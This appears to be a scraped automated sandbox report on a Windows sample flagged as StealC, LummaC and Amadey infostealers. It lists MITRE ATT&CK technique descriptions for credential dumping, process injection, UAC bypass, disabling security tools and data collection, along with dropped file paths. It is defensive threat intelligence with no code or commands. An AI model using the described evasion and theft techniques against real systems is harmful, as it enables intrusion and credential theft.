Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\FCAAEHJDBKJJKFHJEBKF

C:\ProgramData\GHIDGDHC

C:\ProgramData\HIDAKFIJJKJJJKEBKJEH (copy)

C:\ProgramData\IEGCAAKF

C:\ProgramData\JEHIDHDAKJDHJKEBFIEH

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre